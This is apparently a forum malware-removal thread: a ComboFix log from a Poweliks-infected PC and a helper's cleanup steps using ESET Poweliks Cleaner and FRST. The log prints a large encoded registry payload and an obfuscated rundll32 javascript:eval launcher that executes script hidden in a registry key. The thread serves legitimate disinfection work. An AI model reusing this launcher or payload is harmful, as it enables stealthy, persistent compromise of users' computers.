Jf1\Nz071z%7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7J.t$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[b%-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.dXRcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&I\SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SH,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H%762A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,yJXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXR\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\Jy4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[kR\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\Jf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJzRcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&S.]A"Z%2J"t5rwb-|z12I/,$[ OVHiw|IiB~j!N j`w95L4Hp`s"j2w\]jjfHo^pl0sAU N"#qAwjo.ul+1~I!N2j!\x8+g2lss"IhY~tZF]"!w\4Z} H2wCCMOK]!"\HA]x9!sU]iVN?sVB4itGjisV}V^y]Vx\KT#~4TswCjs45 DA.j1Dijwr}(9yCix??yB2`js}] N7IqtB1V2KisA]C9\ju~9KT[ 4TsGt2N#U2j?.`YM[!w1CV^KjugI.Z2;g2sICfNh.A1-i#G?isVCC91]iw\?q$G4TsACwVfU9&5`YKH2"?8!wL]3gA|Za?"js~PiI;4ysu}qs4?3s~}jXZ##Ac}f[oI!t7tZI$\!9slws^]:9I[!9x}iD|IN]65!s7ii1\IZ.3Iosh?T2Z^jwAii9sl!1M?397#`s/g2wqIV,d}3xIC!^fjiDjp`otU392#3s~}ZY3lo}ZKhwUP!jIi#^VI!["r3,t}0V]5jD2}2AN MDA}jDZ}q9AlqLXUj.d]i6$IqF/pTB.?UNW8!8Aj#z*?!#sK/%.nGsVUFwAp`s~}L~V 2x/io9rNw2M}M60iqWH^tF+hoorp.5#2jFPigll!oojPVn AFOqlmV9_i:D} sx/iog+02Y(MY5iq}+?s!X+s$:.UwIn.\v}iwZ+Vo~pisn# Is:yAh1Zwq[Mjn\Kz&js\!}`06tfNn#UI^K.2A1T2IKis~]FxyeV9;N"$_?i1~}`s$5jwAp`s~}LTh#!^f63lZl`o Vs\tTV~p`s$pio~pis~jl?  9Hr9$_?i1;P0}259Ap`s~}jwA}jwA8p"Ml`oxjs9\tTVgHwNBpTo~pis~}jwA}iwf49$o?i1AP0}254jj^V jjwA}jwA}iwAp`oH9V9\tTVjHwNBpT4}IhV~t!wA}iwApio~pi2H6`}254vj^V jkh#!^f}iwAp`oA5js~}iplHwNBpT2}IhV~C(a?  99pio~pis~}`s$5j&\j8V j(th#!^fPVlMl`ox5js~}is~p`s$p#$Z?hV~CV"?  99r9$o?i1~}`s$5jwAp`s~}:Kh8j^fi3lMl`oDjs9\tTV~p`s$pio~pis~jf9K  9|IP$o?i1~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}i9\HwNBp+3lIhV~t!wA}iwf.9$o?i1~}`s$5jxAp`sx}jwA}jwA^+"Ml`ox5js~}iI&HwNBpTo~pis~P x?  99pio~pisG[Aw259Ap`s~}(zh8j^f}iwAp`os1V1\tTV~p`s$p H}?hV~t!wA}iwf?P$D?i1~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5jsU\s5S.wmXl+]o+!6:]!\F V9c4oo"pis~]qId\2\Z+qqHP3xl]Fx* s4r+0os92}jC".V.AIH+iaMjVF`}jxFt39?m+BG1 Yb]2N$5jwZlVI_6(~A]:"jP Sc+0qwgYb]fN~.:AGK#eSIss:iyjDeV9&pio~psI0jAwi\24|p0sVt2ajC Xnis\INj2CC1~}is~j8mqHo2I?U.m sx2e+8Mlh3X.UVb]`.$jXZIw.kiK~H8.xyeVwAp`oMjLs4#q9A5yF l!]_.sIm 2I6 s1FH!ooIU1~]y6Tq.934Vs_nC9H8.xyeVwAp`os::,m#T*H.:1 No]oIUNN]F\Dih8/mq2"pssj\A}]`FtFIjIw[!wA}jxq s4?K^s55xNm#q9_5jN*4o]DIUIm#:gA#s\rIs#M.V,qC:..I39&p`s~}3"L8.\Wt39IsBEqxAN8PV85^N N ]w?U1b\3lX}ijMI#tMIss:#AFX:M8?my9~}jwA]3a/ %~rmy(y::6:\s58p`mxmq2`kpvt8.xyevwapiowku}:#..a\29/lV9_8f\lijxxHVwAp`oA5VV; %tGp`s9K3q~juNd62gHJ+8tNu[^piFa6Vt]1Vg ?`27]!X*]:"?iq^hI`1IIjV;]35Xrq,+.+VWS+,I}jwA}iIF5idWpTw;]A/A"jg j`/WCy9*838YCP^Ym8oKjZY5P+oXrVYKIu["jfIG62&!}ha p+\Mu9;t8A3\jWcI_Na[3"w#&cH%^k4ZoA5js~]rY;+GISz07|fmye(A!8p99piodNh,~}`s$5j\xI0t~jjwAP D1} 9Apjt}9x1 FfNjlqNF.TT7VNh sj9C#`yN+s~ITw0tswu`:Icp`pZe:aAijwA#PwVpqt:}2satfNl}AsX?qBA?i92P Ds[TOAIiH.l3N \^oA5j^WKb, Fyx?tkDHtswxmbO29L1AH3, pjs$p 4glqAai:gZ}iwfp tsr3san_NX\2wppN}2i!&!JXR\]u9ZIy[5tyI i N~p`V+1+HlIoq2J x2}#4I. [^}r,;[Zs$5?Ofp oZ]jwA}jgAt!IcpNeh9jp8\z,Hj^V}lV3W?u}~8F~X}i4IHq\.j *:\8s `yg.+qn^tkr\[!8ACs4INZo}U2t"##s~p`,+j![^}r,5[!wAt+g3pVB~pisU[o1j\ j:SZs2}jwAJ!g2n9~qm \!`M*5\!.~}s5*p ]~lqAZnC9*[+jyIPt2NfWH\ss\U2"SpNp76s~A}jwp[!D5Sy[qqZ,~i#A2l:tKI9]~|TpM}K0h}s06i3Mm"IU8Zofd&1cp`s&ij^&t(gst"41j.t*\jsst%t~}A2zK3BAK3qy}.w/JzRcpiohmT.AHy1o:DtKsF;]jxA}jxCt+\yj`oI"js0]rYtjs}UmULZ!90]jDHth\AIuLZ4!p2joIVn!^\?U%S f"Iif^rHT^xK`LyqC}aC"HM1 VPp tsr3sAHF^LP lIKV}2V.gtZt/gx9jpNI~ijSXj(5*FT^!IN4p}j5Mj NNKZ.rSqBs.o2Z jW*6iww?#]s1oA$j q.dXR\m^1`i2wn].T\t3xn?8B2:ftWCqo7p`1er3o~pis2tjwMiUjyK#27N3.g[ 1d9!Acp`s}jM9xF!I\}P4wK^BAm!VKeTqSIs,"Kiq7N!pMj(5*63^rIrO~jTIWt89Bm.w&}sI^8F~!CFT\CPzh?`dc\ymWijYG?q5fSz0Xr 9a\sT! ugEpTB~IuA.#^NVd gI1s*s\swAijwA}ixAp`oA5&N\tTV~p`s$jio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}i2Oqb3{f}Gxq.a8x5y\sDN(j)04fbO\G/H;o0W81l^&"V8?l?[ l!lqqVd3V![!.H42AP}pByl 1^^Xl1epxyl!ok(PW+]y.T"Mj/}qN4[MjM8&xM[ lLNVs\(VA7C *Z}oqG|![4q!Y^^:lV89tXSh]k4/AqCo9T9w/j_97[MjL[Z0/F!93qA)Wq!9l[!.((j!dq#x4Up.\VZ/ qj94U}.Hs!k 8.B(x5yH^Y9p?0oFsD98U"pN_BNn?3aFj*x4 }-l+iK9ubkBCzEP!jE}f]KS9AWHGbdxMOh|:/g/o0W Fg*^f"V4UX?9*ZC F^S0V;N!#H4fA:t(x C gVmzXg5p9.CVsdoKKvIy.Z]Mj/t9t[!jM42BM9*N[!V74^A-l XZ}pqKFM9t(ujy}p(.Hr*08VhL5 w/4wNa8:"\[F~X8+gA|UAW\ pT}/t(p VT}#O9(j6(}x^!t#DN(ja(.iV![GHzo?X4.`V![ftXp?X4#i^ENG\Xo?3TFoYx4 I}NuB9|j3aF?l98U\\l+iK9ubkB_bdtZShSGba6hZ|WpZ|e+w!5yL1;x/g/U!gZ 1d} #S|92a6hZ|tp4wN9d{Bb#*Ep@#@&id'lcI!U`a_EPb+a~f+x7llr~!Bqbi@#@&i8@#@&7^mY^tvn#@#@&7`@#@&dN@#@&8@#@&1sK/nv#p44IpAA==^#~@
   <NO NAME> REG_SZ          rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
.
(((((((((((((((((((((((((   Files Created from 2014-12-25 to 2015-01-25  )))))))))))))))))))))))))))))))
.
.
2015-01-25 05:43 . 2015-01-25 05:43 -------- d-----w- c:\users\Default\AppData\Local\temp
2015-01-15 03:04 . 2015-01-24 23:33 -------- d-----w- C:\FRST
2015-01-15 01:59 . 2015-01-24 19:35 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-14 04:17 . 2014-12-12 05:11 3971512 ----a-w- c:\windows\system32\ntkrnlpa.exe
2015-01-14 04:17 . 2014-12-12 05:11 3916728 ----a-w- c:\windows\system32\ntoskrnl.exe
2015-01-14 03:13 . 2014-12-19 01:34 116224 ----a-w- c:\windows\system32\drivers\mrxdav.sys
2015-01-14 03:07 . 2014-12-19 02:43 164864 ----a-w- c:\windows\system32\profsvc.dll
2015-01-14 03:07 . 2014-12-11 17:47 56320 ----a-w- c:\windows\system32\TSWbPrxy.exe
2015-01-14 03:07 . 2014-12-06 03:50 242688 ----a-w- c:\windows\system32\nlasvc.dll
2015-01-12 15:58 . 2015-01-12 15:58 -------- d-----w- c:\users\Default\AppData\Roaming\TuneUp Software
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-01-24 22:26 . 2014-08-14 02:31 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-01-22 19:07 . 2013-02-11 18:09 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2015-01-22 19:07 . 2013-02-11 18:09 701616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-12-13 03:33 . 2014-12-17 19:55 115712 ----a-w- c:\windows\system32\ieUnatt.exe
2014-12-09 03:25 . 2014-12-09 03:25 208152 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-12-04 04:38 . 2014-12-16 03:49 337920 ----a-w- c:\windows\system32\generaltel.dll
2014-12-04 04:38 . 2014-12-16 03:49 610304 ----a-w- c:\windows\system32\invagent.dll
2014-12-04 04:38 . 2014-12-16 03:49 315392 ----a-w- c:\windows\system32\devinv.dll
2014-12-04 04:38 . 2014-12-16 03:49 728576 ----a-w- c:\windows\system32\appraiser.dll
2014-12-04 04:38 . 2014-12-16 03:49 159744 ----a-w- c:\windows\system32\aepic.dll
2014-12-04 04:38 . 2014-12-16 03:49 202752 ----a-w- c:\windows\system32\aepdu.dll
2014-12-04 04:34 . 2014-12-16 03:49 873984 ----a-w- c:\windows\system32\aeinv.dll
2014-12-01 23:28 . 2014-12-16 03:49 1160872 ----a-w- c:\windows\system32\aitstatic.exe
2014-11-22 02:20 . 2014-12-16 03:48 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-11-22 02:20 . 2014-12-16 03:49 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-11-22 02:07 . 2014-12-16 03:49 501248 ----a-w- c:\windows\system32\vbscript.dll
2014-11-22 02:07 . 2014-12-16 03:48 62464 ----a-w- c:\windows\system32\iesetup.dll
2014-11-22 02:06 . 2014-12-16 03:49 47616 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-11-22 02:05 . 2014-12-16 03:49 64000 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-11-22 01:55 . 2014-12-16 03:49 102912 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-11-22 01:54 . 2014-12-16 03:49 620032 ----a-w- c:\windows\system32\jscript9diag.dll
2014-11-22 01:48 . 2014-12-16 03:49 667648 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-11-22 01:40 . 2014-12-16 03:49 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-11-22 01:29 . 2014-12-16 03:49 4299264 ----a-w- c:\windows\system32\jscript9.dll
2014-11-22 01:22 . 2014-12-16 03:48 2052096 ----a-w- c:\windows\system32\inetcpl.cpl
2014-11-22 01:21 . 2014-12-16 03:49 1155072 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-11-22 01:00 . 2014-12-16 03:49 1888256 ----a-w- c:\windows\system32\wininet.dll
2014-11-21 12:14 . 2014-08-14 02:31 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-11-21 12:14 . 2014-08-14 02:31 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-11-21 12:14 . 2014-08-14 02:31 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-11-19 03:41 . 2014-11-19 03:41 154904 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-11-18 20:56 . 2014-11-18 20:56 1202848 ----a-w- c:\windows\system32\FM20.DLL
2014-11-16 02:32 . 2014-11-14 21:02 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{CA52C3C8-E202-40F5-AF46-CE139ACCD8CC}\offreg.dll
2014-11-11 02:44 . 2014-12-16 03:49 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-11-11 02:44 . 2014-12-16 03:49 186880 ----a-w- c:\windows\system32\pku2u.dll
2014-11-11 02:44 . 2014-12-16 03:49 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-11-11 01:32 . 2014-12-16 03:49 74752 ----a-w- c:\windows\system32\drivers\tdx.sys
2014-11-08 02:45 . 2014-12-16 03:48 2048 ----a-w- c:\windows\system32\tzres.dll
2014-11-05 03:33 . 2014-11-05 03:33 0 ----a-w- c:\users\User\AppData\Roaming\qkmrs.dll
2014-10-30 01:45 . 2014-12-16 03:48 155136 ----a-w- c:\windows\system32\charmap.exe
2014-10-28 22:28 . 2014-10-28 22:28 96680 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2014-10-28 11:35 . 2013-02-09 00:27 229000 ------w- c:\windows\system32\MpSigStub.exe
2008-10-28 19:41 . 2013-10-16 20:14 238896 ----a-w- c:\program files\mozilla firefox\plugins\CrazyTalk4Native.dll
2008-10-28 19:41 . 2013-10-16 20:14 210320 ----a-w- c:\program files\mozilla firefox\plugins\ctdomemhelper.dll
2008-10-28 19:41 . 2013-10-16 20:14 83248 ----a-w- c:\program files\mozilla firefox\plugins\ctframeplayerobject.dll
2008-10-28 19:41 . 2013-10-16 20:14 431512 ----a-w- c:\program files\mozilla firefox\plugins\ctplayerobject.dll
2008-10-28 19:41 . 2013-10-16 20:14 464176 ----a-w- c:\program files\mozilla firefox\plugins\imagickrt.dll
2008-10-28 19:41 . 2013-10-16 20:14 144688 ----a-w- c:\program files\mozilla firefox\plugins\rlcontentclass.dll
2008-10-28 19:41 . 2013-10-16 20:14 210224 ----a-w- c:\program files\mozilla firefox\plugins\RLMusicPacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 111920 ----a-w- c:\program files\mozilla firefox\plugins\RLMusicUnpacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 218416 ----a-w- c:\program files\mozilla firefox\plugins\RLVoicePacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 173360 ----a-w- c:\program files\mozilla firefox\plugins\RLVoiceUnpacker.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DellSystemDetect"="c:\users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe" [2014-11-04 264488]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-01-11 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-01-11 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-01-11 177944]
"Apoint"="c:\program files\DellTPad\Apoint.exe" [2010-06-04 292208]
"Dell Webcam Central"="c:\program files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" [2009-06-24 409744]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2014-09-26 271744]
"AVG_UI"="c:\program files\AVG\AVG2015\avgui.exe" [2014-12-18 3667472]
"SDTray"="c:\program files\Spybot - Search & Destroy 2\SDTray.exe" [2014-06-24 4101576]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
OemReset.lnk - c:\windows\options\OemReset.exe /audit [2013-2-11 521616]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0\0sdnclean.exe
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2015\avgidsagent.exe [2014-12-18 3432976]
R2 ccSchedulerSVC;Total Defense Common Scheduler Service;c:\program files\Total Defense\Internet Security Suite\ccschedulersvc.exe [x]
R2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\RISDPE64.SYS [2009-10-29 79360]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys [2013-10-03 144600]
R3 CtAudDrv;Provides advanced audio effects for audio devices.;c:\windows\system32\Drivers\CtAudDrv.sys [2009-05-28 134144]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-11-22 102912]
R3 netw5v32;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 32 Bit;c:\windows\system32\DRIVERS\netw5v32.sys [2009-07-13 4231168]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2012-08-23 14848]
R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL3.SYS [2009-07-13 207360]
R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV3.SYS [2009-07-13 980992]
R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT3.SYS [2009-07-13 661504]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2012-08-23 49664]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2012-08-23 27136]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2013-02-09 1343400]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-11-19 154904]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-07-18 230680]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-19 27416]
S0 stdcfltn;Disk Class Filter Driver for Accelerometer;c:\windows\system32\DRIVERS\stdcfltn.sys [2011-07-16 17904]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-19 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-12-09 208152]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-19 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-08-29 192792]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-10-10 200984]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2015\avgwdsvc.exe [2014-12-18 298080]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe [2013-10-03 1678040]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;c:\program files\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-06-24 1738168]
S2 SDUpdateService;Spybot-S&D 2 Updating Service;c:\program files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-06-27 2088408]
S2 SDWSCService;Spybot-S&D 2 Security Center Service;c:\program files\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-04-25 171928]
S3 Acceler;Accelerometer Service;c:\windows\system32\DRIVERS\accelern.sys [2011-10-03 44144]
S3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys [2013-10-03 174936]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys [2009-06-15 143968]
S3 cvusbdrv;Broadcom USH CV;c:\windows\system32\Drivers\cvusbdrv.sys [2008-07-23 32808]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2010-04-06 224424]
S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys [2010-02-27 132480]
S3 NETwNs32;___ Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 32 Bit;c:\windows\system32\DRIVERS\Netwsn00.sys [2012-06-03 10364416]
.
.
Contents of the 'Scheduled Tasks' folder
.
2015-01-25 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-02-11 19:07]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.foxnews.com/
mStart Page = www.google.com
uInternet Settings,ProxyOverride = <-loopback>
uInternet Settings,ProxyServer = http=127.0.0.1:49329;https=127.0.0.1:49329
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_16_0_0_287_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_16_0_0_287_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-01-24  23:45:28
ComboFix-quarantined-files.txt  2015-01-25 05:45
ComboFix2.txt  2015-01-24 22:11
.
Pre-Run: 215,644,499,968 bytes free
Post-Run: 215,607,930,880 bytes free
.
- - End Of File - - CBE45E29BEF2BA49CCF3C2F8A5FBEF08
5C616939100B85E558DA92B899A0FC36
 

Link to post
Share on other sites

Nope, Poweliks is still sitting there.

ESETOnline.png Scan with ESET Poweliks Cleaner

Please download ESET Poweliks Cleaner and save the file to your desktop.

  • Right-click on ESETOnline.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • If the tool will find Poweliks, you will be prompted Win32/Poweliks found in your system.
  • Press Y to continue the removal.
  • You should be noted that the tool succesfully removed the threat from your system.
  • The tool will also produce a logfile on your desktop, named ESETPoweliksCleaner_Date.Time.
Please attach this file to your next reply. To do so:

- after typing in your message, click More reply options instead of Post.

- below the post preview and the post editor, you should be able to see Attach files option - please click Choose file.

- in the pop-up window navigate to the desktop. Choose the one named ESETPoweliksCleaner_Date.Time.log and attach it.

If the file will be to big to attach it (it may happen), then please host it on a Dropbox account or a site like mediafire.com, providing me the link to the uploaded file.

Link to post
Share on other sites

Radek,
Thank you for these quick replies! 

I keep having to go into Internet Explorer Tools...Internet Options...Security Tab...Custome Level...then click the Allow Downloads.  For some reason that options keeps getting reset back to 'don't allow downloads'.  I wonder if that is from the virus or some other setting I have?

 

Ok, on to ESET.

I downloaded it, ran it as administrator and it found POWELIKS and asked me if I wanted to remove it.  I said YES and then it said I needed to restart.  I restarted and here went here to reply to this post.

 

So far, my CPU is at 0 or 1 percent and physical memory is at 33%.  So, that looks good. Although, I do have two iexplorer.exe processes open.

 

Attached you should find my ESET log file.

 

ESETPoweliksCleaner.exe_20150125.113914.8688.log

Link to post
Share on other sites

Hi :)

Looks like we were able to hunt down and kill the naughty one. Let's see where we are here.

FRST.gif Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.

    > XP users click run after receipt of Windows Security Warning - Open File.

